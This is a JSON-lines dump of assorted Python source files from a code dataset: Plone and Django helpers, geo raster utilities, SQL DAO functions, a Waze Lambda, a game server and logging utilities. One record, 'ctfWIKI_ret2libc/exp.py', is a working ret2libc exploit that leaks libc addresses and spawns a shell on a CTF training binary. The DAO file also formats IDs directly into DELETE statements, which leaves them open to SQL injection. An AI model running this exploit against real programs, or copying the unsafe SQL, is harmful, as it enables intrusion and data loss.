%s\" % uid)\n\n return obj\n\ndef find_target_container(record, portal_type):\n \"\"\" find the target container for this record\n\n \"\"\"\n parent_uid = record.get(\"parent_uid\")\n\n if parent_uid:\n # if we have an parent_uid, we use it\n return get_object_by_uid(parent_uid)\n\n if parent_uid == 0:\n return get_portal()\n\n raise RuntimeError(\"Could not find a suitable place to create the content\")\n\ndef do_action_for(obj, transition):\n \"\"\" perform wf transition \"\"\"\n return ploneapi.content.transition(obj, transition)\n\ndef get_current_user():\n \"\"\" return the current logged in user \"\"\"\n return ploneapi.user.get_current()\n\ndef create_object_in_container(container, portal_type, record):\n \"\"\" creates an object with the given data in the container\n \"\"\"\n from AccessControl import Unauthorized\n try:\n title = record.get(\"title\")\n obj = ploneapi.content.create(\n container=container, type=portal_type, title=title, save_id=True)\n return update_object_with_data(obj, record)\n except Unauthorized:\n raise RuntimeError(\"You are not allowed to create this content\")\n\ndef update_object_with_data(content, record):\n \"\"\" update the content with the values from records\n \"\"\"\n schema = get_schema(content)\n is_atct = IATContentType.providedBy(content)\n is_dext = IDexterityContent.providedBy(content)\n\n for k, v in record.items():\n\n if is_atct:\n field = schema.get(k)\n\n if is_dext:\n schemas = list()\n schemas.append(schema)\n schemas.extend(get_behaviors_schema(content))\n for i in schemas:\n field = i.get(k)\n if field:\n break\n\n logger.info(\"update_object_with_data::processing key=%r, value=%r, field=%r\", k, v, field)\n if field is None:\n logger.info(\"update_object_with_data::skipping key=%r\", k)\n continue\n\n if is_atct:\n # XXX handle security\n mutator = field.getMutator(content)\n mutator(v)\n else:\n #ugly hack for tags\n if ICategorization is field.interface:\n content.setSubject(v)\n\n elif IPublication is field.interface:\n if k == u'effective':\n content.setEffectiveDate(v)\n elif k == u'expires':\n content.setExpirationDate(v)\n\n elif INamedBlobImageField.providedBy(field):\n filename = v.get(\"filename\")\n data = b64decode(v.get(\"data\"))\n file_obj = 
NamedBlobImage(data,filename=filename)\n field.validate(file_obj)\n field.set(content, file_obj)\n\n elif INamedBlobFileField.providedBy(field):\n filename = v.get(\"filename\")\n data = b64decode(v.get(\"data\"))\n file_obj = NamedBlobFile(data, filename=filename)\n field.validate(file_obj)\n field.set(content, file_obj)\n\n else:\n field.validate(v)\n field.set(content, v)\n\n content.reindexObject()\n return content\n\n# vim: set ft=python ts=4 sw=4 expandtab :\n\n","sub_path":"src/plone/jsonapi/routes/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":14122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"549251505","text":"from django.shortcuts import render\nfrom . import models\n\ndef index(request):\n num_books= models.Book.objects.all().count()\n num_instances= models.BookInstance.objects.all().count()\n num_instances_available= models.BookInstance.objects.filter(status__exact='a').count()\n num_authors= models.Author.objects.all().count()\n return render(\n request,\n 'app1/index.html',\n context= {'num_books': num_books, 'num_instances': num_instances,'num_instances_available': num_instances_available, 'num_authors': num_authors}\n )\n","sub_path":"locallibrary/app1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"323199902","text":"# -------------------------------------------------------------------------------------\n# Library\nimport logging\nimport numpy as np\nimport rasterio\nimport rasterio.crs\nimport os\nimport matplotlib.pylab as plt\n\nfrom lib_hs_io_generic import create_darray_2d\n\nlogging.getLogger('rasterio').setLevel(logging.WARNING)\n# -------------------------------------------------------------------------------------\n\n\n# --------------------------------------------------------------------------------\n# Method to convert decimal degrees to km (2)\ndef deg_2_km(deg):\n # Earth radius\n earth_radius = 6378.1370\n km = deg * (np.pi * earth_radius) / 180\n return km\n# --------------------------------------------------------------------------------\n\n\n# --------------------------------------------------------------------------------\n# Method to convert km to decimal degrees\ndef km_2_deg(km):\n # Earth radius\n earth_radius = 6378.1370\n deg = 180 * km / (np.pi * earth_radius)\n return deg\n# --------------------------------------------------------------------------------\n\n\n# --------------------------------------------------------------------------------\n# Method to find XY geographical indexes\ndef find_geo_index(geo_x_ref, geo_y_ref, geo_x_var, geo_y_var, geo_cellsize_var):\n\n # Get geographical information\n yu_ref = np.max(geo_y_ref)\n xl_ref = np.min(geo_x_ref)\n # Compute index\n index_y_var = np.ceil((yu_ref - geo_y_var.ravel()) / geo_cellsize_var)\n index_x_var = np.ceil((geo_x_var.ravel() - xl_ref) / geo_cellsize_var)\n # From double to integer\n index_x_var = np.int32(index_x_var)\n index_y_var = np.int32(index_y_var)\n\n return index_x_var, index_y_var\n# --------------------------------------------------------------------------------\n\n\n# -------------------------------------------------------------------------------------\n# Method to get a raster ascii file\ndef read_file_raster(file_name, file_proj='epsg:4326', var_name='land',\n coord_name_x='west_east', coord_name_y='south_north',\n dim_name_x='west_east', dim_name_y='south_north', 
no_data_default=-9999.0):\n\n if os.path.exists(file_name):\n if (file_name.endswith('.txt') or file_name.endswith('.asc')) or file_name.endswith('.tif'):\n\n crs = rasterio.crs.CRS({\"init\": file_proj})\n with rasterio.open(file_name, mode='r+') as dset:\n dset.crs = crs\n bounds = dset.bounds\n no_data = dset.nodata\n res = dset.res\n transform = dset.transform\n data = dset.read()\n proj = dset.crs.wkt\n values = data[0, :, :]\n\n if (no_data is None) or (np.isnan(no_data)):\n no_data = no_data_default\n\n decimal_round = 7\n\n center_right = bounds.right - (res[0] / 2)\n center_left = bounds.left + (res[0] / 2)\n center_top = bounds.top - (res[1] / 2)\n center_bottom = bounds.bottom + (res[1] / 2)\n\n lon = np.arange(center_left, center_right + np.abs(res[0] / 2), np.abs(res[0]), float)\n lat = np.flip(np.arange(center_bottom, center_top + np.abs(res[0] / 2), np.abs(res[1]), float), axis=0)\n lons, lats = np.meshgrid(lon, lat)\n\n if center_bottom > center_top:\n center_bottom_tmp = center_top\n center_top_tmp = center_bottom\n center_bottom = center_bottom_tmp\n center_top = center_top_tmp\n values = np.flipud(values)\n lats = np.flipud(lats)\n\n # # Debug\n # plt.figure()\n # plt.imshow(lats)\n # plt.colorbar()\n #\n # # Debug\n # plt.figure()\n # plt.imshow(values)\n # plt.colorbar()\n # plt.show()\n\n min_lon_round = round(np.min(lons), decimal_round)\n max_lon_round = round(np.max(lons), decimal_round)\n min_lat_round = round(np.min(lats), decimal_round)\n max_lat_round = round(np.max(lats), decimal_round)\n\n center_right_round = round(center_right, decimal_round)\n center_left_round = round(center_left, decimal_round)\n center_bottom_round = round(center_bottom, decimal_round)\n center_top_round = round(center_top, decimal_round)\n\n assert min_lon_round == center_left_round\n assert max_lon_round == center_right_round\n assert min_lat_round == center_bottom_round\n assert max_lat_round == center_top_round\n\n dims = values.shape\n high = dims[0] # nrows\n wide = dims[1] # cols\n\n bounding_box = [min_lon_round, max_lat_round, max_lon_round, min_lat_round]\n\n da = create_darray_2d(values, lons, lats, coord_name_x=coord_name_x, coord_name_y=coord_name_y,\n dim_name_x=dim_name_x, dim_name_y=dim_name_y, name=var_name)\n\n else:\n logging.error(' ===> Geographical file ' + file_name + ' format unknown')\n raise NotImplementedError('File type reader not implemented yet')\n else:\n logging.error(' ===> Geographical file ' + file_name + ' not found')\n raise IOError('Geographical file location or name is wrong')\n\n return da, wide, high, proj, transform, bounding_box, no_data\n# -------------------------------------------------------------------------------------\n","sub_path":"apps/ground_network/hs/lib_hs_geo.py","file_name":"lib_hs_geo.py","file_ext":"py","file_size_in_byte":5507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"562701179","text":"from dao.dao import get_dao\n\n\n@get_dao\ndef get_neighborhoods(dao):\n sql = \"SELECT * FROM neighborhoods;\"\n return dao.execute(sql)\n\n\n@get_dao\ndef get_turf_types(dao):\n sql = \"SELECT * FROM neighborhood_type;\"\n return dao.execute(sql)\n\n\n@get_dao\ndef get_my_county(dao):\n sql = \"SELECT DISTINCT county_code, county_name FROM precincts\"\n return dao.execute(sql)\n\n\n@get_dao\ndef get_jurisdictions(dao):\n sql = (\"SELECT DISTINCT jurisdiction_code, jurisdiction_name \"\n \"FROM precincts;\")\n return dao.execute(sql)\n\n\n@get_dao\ndef get_wards(dao, 
jurisdiction_code):\n sql = (\"SELECT DISTINCT(ward) FROM precincts \"\n \"WHERE jurisdiction_code=?;\")\n vals = (jurisdiction_code,)\n return dao.execute(sql, vals)\n\n\n@get_dao\ndef get_precincts(dao, jurisdiction_code=None, ward_no=None):\n sql = \"SELECT * FROM precincts \"\n vals = None\n if jurisdiction_code:\n sql += \" WHERE jurisdiction_code=?\"\n vals = (jurisdiction_code,)\n if ward_no:\n sql += \" AND ward=?\"\n vals = (jurisdiction_code, ward_no)\n # leading space keeps the SQL valid when the optional filters are appended\n sql += ' ORDER BY jurisdiction_name, ward, precinct;'\n return dao.execute(sql, vals)\n\n\n@get_dao\ndef get_turf(dao, addr):\n sql = (\"SELECT * FROM streets \"\n \"WHERE street_name_meta LIKE ? \"\n \"AND street_name LIKE ? \"\n \"AND ? BETWEEN block_low AND block_high \"\n \"AND odd_even IN (?, ?) \")\n vals = [\n addr.metaphone + '%',\n addr.street_name[0] + '%',\n addr.house_number,\n \"B\", addr.odd_even\n ]\n\n if addr.pre_direction:\n sql += \"AND pre_direction=? \"\n vals.append(addr.pre_direction)\n if addr.suf_direction:\n sql += \"AND suf_direction=? \"\n vals.append(addr.suf_direction)\n\n if addr.zipcode:\n sql += \"AND zipcode LIKE ? \"\n vals.append(addr.zipcode[0:-1] + '%')\n elif addr.city:\n sql += \"AND city=? \"\n vals.append(addr.city)\n\n return dao.execute(sql, vals)\n\n\n@get_dao\ndef get_streets(dao, jurisdiction_code, ward, precinct):\n sql = (\"SELECT street_name, street_type \"\n \"FROM streets \"\n \"WHERE jurisdiction_code=? \"\n \"AND ward=? \"\n \"AND precinct=? \"\n \"GROUP BY street_name, street_type;\")\n vals = [jurisdiction_code, ward, precinct]\n return dao.execute(sql, vals)\n\n\n@get_dao\ndef get_house_nums(dao, county_code, jurisdiction, street_name, street_type):\n sql = (\"SELECT * \"\n \"FROM streets \"\n \"WHERE county_code=? \"\n \"AND jurisdiction_code=? \"\n \"AND street_name=? \"\n \"AND street_type=? \"\n \"GROUP BY house_num_low, house_num_high;\")\n vals = [\n county_code, jurisdiction, street_name, street_type\n ]\n return dao.execute(sql, vals)\n\n\n@get_dao\ndef add_neighborhood(dao, ntype, name, pct_ids, blocks):\n sql = (\"INSERT INTO neighborhoods \"\n \"(name, type) VALUES (?,?);\")\n vals = (name, ntype)\n nbh_id = dao.execute(sql, vals)\n\n if pct_ids:\n add_nbh_precincts(dao, nbh_id, pct_ids)\n\n if blocks:\n add_blocks(dao, nbh_id, blocks)\n\n return nbh_id\n\n\n@get_dao\ndef neighborhood_name(dao, id, name):\n sql = \"UPDATE neighborhoods SET name=? 
WHERE id=?\"\n result = dao.execute(sql, (name, id))\n if result != 1:\n raise Exception('Unexpected update error!')\n\n\n@get_dao\ndef neighborhood_drop(dao, id):\n sqls = [\n \"DELETE FROM blocks WHERE neighborhood_id=%s\" % (id,),\n \"DELETE FROM neighborhood_precincts WHERE neighborhood_id=%s\" % (id,),\n \"DELETE FROM neighborhoods WHERE id=%s\" % (id,)\n ]\n dao.transaction(sqls)\n\n\n@get_dao\ndef add_nbh_precincts(dao, nbh_id, pct_ids):\n flds = ['neighborhood_id', 'precinct_id']\n vals = [(nbh_id, pct_id) for pct_id in pct_ids]\n dao.add_many('neighborhood_precincts', flds, vals)\n\n\n@get_dao\ndef add_blocks(dao, nbh_id, vals):\n flds = [\n 'street_name',\n 'street_type',\n 'low_addr',\n 'high_addr',\n 'odd_even',\n 'precinct_id',\n 'neighborhood_id'\n ]\n vals = [val + (nbh_id,) for val in vals]\n dao.add_many('blocks', flds, vals)\n\n\n@get_dao\ndef get_blocks(dao, nbh_id):\n sql = (\"SELECT precinct_id, street_name, street_type, low_addr, high_addr, odd_even \"\n \" FROM blocks WHERE neighborhood_id=?\")\n return dao.execute(sql, (nbh_id,))\n\n\n@get_dao\ndef get_neighborhood_precincts(dao, nbh_id):\n sql = (\"SELECT precinct_id FROM neighborhood_precincts \"\n \"WHERE neighborhood_id=?\")\n return dao.execute(sql, (nbh_id,))\n","sub_path":"dao/turf_dao.py","file_name":"turf_dao.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"571107923","text":"#!/usr/bin/env python3\n\n# Reads a named pipe file and displays progress bars using curses.\n#\n# See multi_curl_progress_advanced.php\n#\n# $ ipython multi_curl_progress_advanced_watch_curses.py\n# 56% [=====================> ]\n# 23% [========> ]\n# 15% [=====> ]\n\nimport curses\nimport json\nimport os\n\n\nFIFO = \"/tmp/myfifo\"\n\n\ndef main(stdscr):\n # Create named pipe file if it doesn't exist.\n if not os.path.exists(FIFO):\n os.mkfifo(FIFO)\n\n curses.noecho()\n curses.cbreak()\n\n try:\n while True:\n display_progress_bars(stdscr)\n except KeyboardInterrupt:\n # Handle Control-C pressed.\n pass\n finally:\n curses.echo()\n curses.nocbreak()\n curses.endwin()\n\n # Return exit code 0.\n return 0\n\n\ndef display_progress_bars(stdscr):\n display_notice = True\n\n while True:\n if display_notice:\n display_notice = False\n stdscr.clear()\n stdscr.addstr(0, 0, \"waiting for input\")\n stdscr.refresh()\n\n # Read named pipe file.\n with open(FIFO) as f:\n for line in f:\n response = json.loads(line)\n\n # Update progress for each of the files being downloaded.\n for entry in response.get(\"downloads\", []):\n # Display a progress bar: xxx% [=======> ]\n progress_size = 40\n try:\n fraction_downloaded = entry[\"downloaded\"] / entry[\"size\"]\n except ZeroDivisionError:\n fraction_downloaded = 0\n dots = round(fraction_downloaded * progress_size)\n task_progress = \"%3.0f%% [\" % (fraction_downloaded * 100)\n\n i = 0\n while i < dots - 1:\n task_progress += \"=\"\n i += 1\n\n task_progress += \">\"\n\n while i < progress_size - 1:\n task_progress += \" \"\n i += 1\n\n task_progress += \"]\"\n\n stdscr.addstr(entry[\"position\"], 0, task_progress)\n\n # Refresh display of the progress bars.\n stdscr.refresh()\n\n # Exit only after progress bars have been updated to end with\n # each displaying 100%.\n if response.get(\"status\", \"\") == \"done\":\n return\n\n\nif __name__ == \"__main__\":\n # Avoid getting the terminal in an unmanagable state by using the curses\n # wrapper. 
The wrapper restores the terminal to its previous state even when\n # there is an uncaught exception.\n curses.wrapper(main)\n","sub_path":"examples/multi_curl_progress_advanced_watch_curses.py","file_name":"multi_curl_progress_advanced_watch_curses.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"345954728","text":"import sys\nimport logging\nimport functools\nimport loguru\n\n\ndef log_func(*, entry=True, exit=True, level=\"DEBUG\"):\n def wrapper(func):\n name = func.__name__\n\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n logger = loguru.logger.opt(depth=1)\n if entry:\n logger.log(\n level, \"Entering '{}' (args={}, kwargs={})\", name, args, kwargs\n )\n result = func(*args, **kwargs)\n if exit:\n logger.log(level, \"Exiting '{}' (result={})\", name, result)\n return result\n\n return wrapped\n\n return wrapper\n\n\nclass InterceptHandler(logging.Handler):\n stream = sys.stderr\n\n def emit(self, record):\n # Get corresponding Loguru level if it exists\n try:\n level = loguru.logger.level(record.levelname).name\n except ValueError:\n level = record.levelno\n\n # Find the caller from which the logged message originated\n frame, depth = logging.currentframe(), 2\n while frame.f_code.co_filename == logging.__file__:\n frame = frame.f_back\n depth += 1\n\n loguru.logger.opt(depth=depth, exception=record.exc_info).log(\n level, record.getMessage()\n )\n\n\ndef get_loglevel():\n # Level from --log-level when using uvicorn\n # If uvicorn doesn't define a level, the logger default (root logger) is\n # used, which is WARNING\n return logging.getLogger('uvicorn').getEffectiveLevel()\n\n\ndef get_logformat(record):\n if 'var' in record['extra']:\n return loguru._defaults.LOGURU_FORMAT + ' {extra[var]}\\n'\n return loguru._defaults.LOGURU_FORMAT + '\\n'\n\n\nclass LogHandler:\n def __ror__(self, obj):\n if isinstance(obj, dict):\n logger = loguru.logger.bind(var=obj)\n else:\n logger = loguru.logger.bind(\n var={'str': str(obj), '__repr__': repr(obj), 'type': type(obj)}\n )\n\n logger.opt(depth=1, ansi=True).debug('Object')\n return obj\n\n def __call__(self, *args, **kwargs):\n return getattr(loguru.logger.opt(depth=1), self.level)(*args, **kwargs)\n\n def __getattr__(self, level):\n handler = LogHandler()\n handler.level = level\n return handler\n\n def setup(self):\n loguru.logger.remove()\n loguru.logger.add(sys.stdout, format=get_logformat, level=get_loglevel())\n loguru.logger.bind(request_id='app')\n logging.basicConfig(handlers=[InterceptHandler()], level=0)\n\n # Can be removed when https://github.com/encode/uvicorn/issues/630 is fixed?\n # Also see https://github.com/Delgan/loguru/issues/247\n logging.getLogger().handlers = [InterceptHandler()]\n\n\nlog = LogHandler()\nlog.setup()\n","sub_path":"api/data/opa/core/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"107836958","text":"from common.logger_utility import *\nfrom common.constants import *\nfrom core.alerts import *\nfrom core.irregularities import *\nfrom core.jams import *\nfrom core.trafficview import *\nimport json\nimport urllib.parse\nimport boto3\n# os and Attr are referenced below (os.environ lookups, DynamoDB scan filter)\nimport os\nfrom boto3.dynamodb.conditions import Attr\n\n\nclass WazeDataCuration:\n\n def __extract_event_metadata(self, event):\n try:\n sns_message = json.loads(event[\"Records\"][0][\"Sns\"][\"Message\"])\n bucket_name = sns_message[\"Records\"][0][\"s3\"][\"bucket\"][\"name\"]\n event_time = 
event[\"Records\"][0][\"Sns\"][\"Timestamp\"]\n key = urllib.parse.unquote_plus(sns_message[\"Records\"][0][\"s3\"][\"object\"][\"key\"])\n except Exception as e:\n LoggerUtility.logError(\"Unable to extract bucket name and key from sns message\")\n raise e\n return bucket_name, key, event_time\n\n def __read_raw_data_from_submission_file(self, bucket, key, aws_request_id, event_time):\n try:\n s3_resource = boto3.resource('s3')\n s3_object = s3_resource.Object(bucket, key)\n data = s3_object.get()['Body'].read().decode('utf-8')\n metadata = s3_object.get()['Metadata']\n data_set = key.split('/')[0]\n curated_bucket = os.environ['CURATED_BUCKET_NAME']\n if 'wazetrafficview' == data_set:\n trafficview = TrafficView()\n trafficview.curate_traffic_view_data(data, key, data_set, curated_bucket, metadata, aws_request_id, event_time)\n\n if 'waze' == data_set:\n traffic_type = key.split('/type=')[1].split('/')[0]\n state_name = key.split('/state=')[1].split('/')[0]\n if traffic_type == \"alert\":\n alerts = Alerts()\n alerts.curate_alert_data(data, state_name, key, data_set, curated_bucket, metadata, aws_request_id, event_time)\n if traffic_type == \"jam\":\n jams = Jams()\n jams.curate_jams_data(data, state_name, key, data_set, curated_bucket, metadata, aws_request_id, event_time)\n if traffic_type == \"irregularity\":\n irregularities = Irregularities()\n irregularities.curate_irregularities_data(data, state_name, key, data_set, curated_bucket, metadata, aws_request_id, event_time)\n except Exception as e:\n LoggerUtility.logError(\"Unable to read the raw submission file\")\n raise e\n\n def __get_current_batch_id(self):\n try:\n dynamodb_batch_table_name = os.environ['DDB_BATCH_TABLE_ARN'].split('/')[1]\n dynamodb = boto3.resource('dynamodb')\n batch_table = dynamodb.Table(dynamodb_batch_table_name)\n response = batch_table.scan(\n FilterExpression=Attr('IsCurrent').eq('true')\n )\n batch_id = \"\"\n if response['Count'] != 0:\n for item in response['Items']:\n batch_id = item['BatchId']\n LoggerUtility.logInfo(\"Current batch id - {}\".format(batch_id))\n except Exception as e:\n LoggerUtility.logError(\"Unable to fetch current batch id\")\n raise e\n return batch_id\n\n def waze_data_curation(self, event, context):\n bucket_name, key, event_time = self.__extract_event_metadata(event)\n #batch_id = self.__get_current_batch_id()\n request_id = context.aws_request_id\n self.__read_raw_data_from_submission_file(bucket_name, key, request_id, event_time)\n","sub_path":"lambdas/waze_data_curation_lambda_handler.py","file_name":"waze_data_curation_lambda_handler.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"322761235","text":"# coding=utf-8\nimport datetime\nfrom game.models import Game\nfrom player.remote import RemotePlayer\nimport json\nfrom error.models import GameError\nfrom gevent import monkey\nfrom renderer.websocket import WebSocketRenderer\nfrom game.server import ServerGame\n \n# Use gevent monkey thread patch\nmonkey.patch_all()\n\nimport library.bottle\n\nclass Server(object):\n \"\"\"\n \" The Server class. 
It provides the REST API server that will allow\n \" a multiple remote player game.\n \"\n \"\"\"\n\n def __init__(self, address):\n \"\"\"\n \" Server constructor.\n \"\n \" @param (host, port) binding address\n \"\"\"\n\n super(Server, self).__init__()\n \n self.address = address\n self.server = library.bottle.Bottle()\n \n # Initialize server games\n self.current_game_id = 0\n self.games = {}\n \n def run(self):\n \"\"\"\n \" Start the server thread.\n \"\n \"\"\"\n # Initialize routes\n #Game initialization routes\n self.server.route(\"/game\", method=\"POST\")(self.http_create_game)\n self.server.route(\"/game//player\", method=\"POST\")(self.http_add_player)\n self.server.route(\"/game//player//ready\", method=\"POST\")(self.http_set_player_ready)\n self.server.route(\"/game//start\", method=\"GET\")(self.http_game_start)\n\n #Game informations routes\n self.server.route(\"/game//players\", method=\"GET\")(self.http_get_players)\n\n #Game actions routes\n self.server.route(\"/game//player//move\", method=\"POST\")(self.http_move)\n\n # Start Bottle server\n self.log(\"Start the server with address (%s, %s)\" % (self.address[0], self.address[1]))\n library.bottle.run(self.server, host=self.address[0], port=self.address[1], server='gevent')\n self.log(\"Server ending\")\n \n def stop(self):\n \"\"\"\n \" Stop the server\n \"\n \"\"\"\n library.bottle.abort()\n \n def http_add_player(self, game_id):\n \"\"\"\n \" Add a player to a game.\n \"\n \"\"\"\n if self.games.has_key(game_id):\n # Get the game object\n game = self.games.get(game_id)\n \n # Compute the player object\n name = self.getJson('name')\n player = RemotePlayer(name)\n \n try:\n game.add_player(player)\n \n # Return player_id\n return self.returnJson({\n 'player_id': player.id\n })\n except GameError as e:\n return self.return_error(e.getValue())\n else:\n return self.return_error(\"The game doesn't exists\")\n \n def http_get_players(self, game_id):\n \"\"\"\n \" Get game players\n \"\n \"\"\"\n if self.games.has_key(game_id):\n # Get the game object\n game = self.games.get(game_id)\n \n return self.returnJson([player.toJSON() for player in game.players])\n else:\n return self.return_error(\"The game doesn't exists\")\n \n def http_set_player_ready(self, game_id, player_id):\n \"\"\"\n \" Set the player ready.\n \"\n \"\"\"\n if self.games.has_key(game_id):\n # Get the game object\n game = self.games.get(game_id)\n player = game.get_player(player_id)\n \n if player is not None:\n player.setReady()\n return self.returnJson({\"message\": \"OK\"})\n else:\n return self.return_error(\"The player doesn't exists\")\n else:\n return self.return_error(\"The game doesn't exists\")\n \n def http_game_start(self, game_id):\n \"\"\"\n \" Return when the player can start the game.\n \"\n \"\"\"\n if self.games.has_key(game_id):\n # Get the game and player object\n game = self.games.get(game_id)\n \n for player in game.players:\n # Wait 60 seconds for the player to be ready, else\n # raise an error\n try:\n player.waitPlay()\n \n return self.http_get_players(game_id)\n except GameError as e:\n return self.return_error(e.getValue())\n \n else:\n return self.return_error(\"The game doesn't exists\")\n\n def http_create_game(self):\n \"\"\"\n \" Create a new game on server.\n \"\n \"\"\"\n self.current_game_id += 1\n game_id = self.current_game_id\n num_players = self.getJson('num_players')\n \n # Create game object and store it\n game = ServerGame(num_players)\n self.games[game_id] = game\n \n # Create and store the renderer\n 
game.setRenderer(WebSocketRenderer(game))\n \n # Start game\n game.start()\n \n return {\n 'game_id': game_id\n }\n \n def returnJson(self, obj):\n \"\"\"\n \" Serialize an object to a JSON string.\n \"\n \"\"\"\n return json.dumps(obj)\n \n def getJson(self, name=None):\n \"\"\"\n \" Get an attribute of (or entiere) sent JSON.\n \"\n \"\"\"\n parsed_json = json.load(library.bottle.request.body)\n if name is None:\n return parsed_json\n else:\n return parsed_json.get(name)\n \n def return_error(self, message):\n \"\"\"\n \" Return an error\n \"\n \" @param string message\n \" @return string\n \"\"\"\n return self.returnJson({\n 'error': message\n })\n\n def http_move(self, game_id, player_id):\n \"\"\" Handle the request to move the block\n \"\"\"\n\n if self.games.has_key(game_id):\n # Get the game object\n game = self.games.get(game_id)\n if game.state == Game.STATE_WAITING:\n return self.return_error(\"Game is not yet started\")\n\n player = game.get_player(player_id)\n\n move_id = self.getJson(\"move_id\")\n\n avalaible_moves = ['',\n player.ACTION_MOVE_RIGHT,\n player.ACTION_ROTATE_LEFT,\n player.ACTION_MOVE_DOWN,\n player.ACTION_MOVE_FULLDOWN,\n player.ACTION_ROTATE_LEFT,\n player.ACTION_ROTATE_RIGHT,\n player.ACTION_SYM_HORIZONTAL,\n player.ACTION_SYM_VERTICAL,\n player.ACTION_PASS\n ]\n\n try:\n player.do(avalaible_moves[move_id])\n return self.http_get_players(game_id)\n except:\n return self.return_error(\"Impossible Move\")\n else:\n return self.return_error(\"The game doesn't exists\")\n \n def log(self, message):\n \"\"\"\n \" Output some log on the standard output.\n \"\n \" @param string the message to be logged\n \"\"\"\n print (\"%s: %s\" % (datetime.datetime.now(), message))","sub_path":"server/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"139121627","text":"import pytest\n\n\n@pytest.mark.usefixtures(\"get_driver\")\n@pytest.mark.P2\n@pytest.mark.tba\nclass TestEmailValidation:\n def test_email_validation(self):\n \"\"\"\n Verify e-mail field validation during users registration.\n\n 1. Open main page.\n 2. Move to registration form.\n 3. Provide invalid data in e-mail field:\n - simple text, ie 'user'\n - invalid format, ie 'wp.pl'\n - e-mail already existing\n 4. 
Confirm registration.\n\n Expected result:\n The user should still be on the registration page.\n The e-mail field should be marked with a validation message.\n The user should not receive a registration e-mail.\n \"\"\"","sub_path":"tests/ui/registration/validation/test_email_validation/test_email_validation.py","file_name":"test_email_validation.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"290844460","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__Author__ = 'M4x'\n\nfrom pwn import *\nfrom LibcSearcher import LibcSearcher\ncontext.log_level = \"debug\"\n\nelf = ELF(\"./ret2lib\")\nputs_got = elf.got[\"puts\"]\n\nio = process(\"./ret2lib\")\nio.sendlineafter(\" :\", str(puts_got))\nio.recvuntil(\"0x\")\nputs_addr = int(io.recvuntil(\"\\n\"), 16)\n\nlibc = LibcSearcher(\"puts\", puts_addr)\nlibc_base = puts_addr - libc.dump(\"puts\")\nsys_addr = libc_base + libc.dump(\"system\")\nsh_addr = libc_base + libc.dump(\"str_bin_sh\")\n\npayload = fit({0x38 + 0x4: [p32(sys_addr), p32(0xdeadbeef), p32(sh_addr)]})\nio.sendlineafter(\" :\", payload)\nio.interactive()\nio.close()\n","sub_path":"ctfWIKI_ret2libc/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"209673909","text":"import datetime\nimport calendar\n\ndef addMonths(origDate, numMonths):\n # Advance the year and month by numMonths\n newYear = origDate.year\n newMonth = origDate.month + numMonths\n # Note: in datetime.date, months go from 1 to 12, so normalize any overflow\n newYear += (newMonth - 1) // 12\n newMonth = (newMonth - 1) % 12 + 1\n\n lastDayOfMonth = calendar.monthrange(newYear, newMonth)[1]\n newDay = min(origDate.day, lastDayOfMonth)\n\n return origDate.replace(year=newYear, month=newMonth, day=newDay)\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"188202626","text":"\"\"\"\nMarshallers for the current endpoint\n\"\"\"\nfrom copy import deepcopy\nfrom flask_restplus import fields\nfrom .namespaces import api\n\n# provider marshaller construction\nprovider_fields = {}\nprovider_fields['id'] = fields.Integer(description='Provider id',\n example=14)\nprovider_fields['name'] = fields.String(required=True,\n min_length=1, max_length=200,\n description='Provider Name',\n example='Snakeoil Ltd')\nprovider_fields['email'] = fields.String(required=True,\n example='email@mydomain.com',\n pattern=r'\\S+@\\S+\\.\\S+',\n description='Provider e-mail')\nprovider_fields['phone'] = fields.String(required=True,\n example='+359888784983',\n pattern=r'[\\+\\d]+',\n description='Phone Number')\nprovider_fields['language'] = fields.String(required=True,\n example='EN',\n min_length=2,\n max_length=3,\n description='Language,'\n ' choose one from'\n ' language list')\nprovider_fields['currency'] = fields.String(required=True,\n example='BGN',\n min_length=3,\n max_length=3,\n description='Currency,'\n ' choose one from'\n ' currency list')\nprovider_fields['uri'] = fields.Url('providers_provider',\n description='Provider URI')\n\n# construct get marshaller from the fields\nprovider_get_marsh = api.model('ProviderGet', provider_fields)\n\n# edit marshaller\nprovider_edit_fields = deepcopy(provider_fields)\ndel provider_edit_fields['id']\ndel provider_edit_fields['uri']\nprovider_edit_marsh = api.model('ProviderEdit', 
provider_edit_fields)\n","sub_path":"api_example/apis/providers/marshallers.py","file_name":"marshallers.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
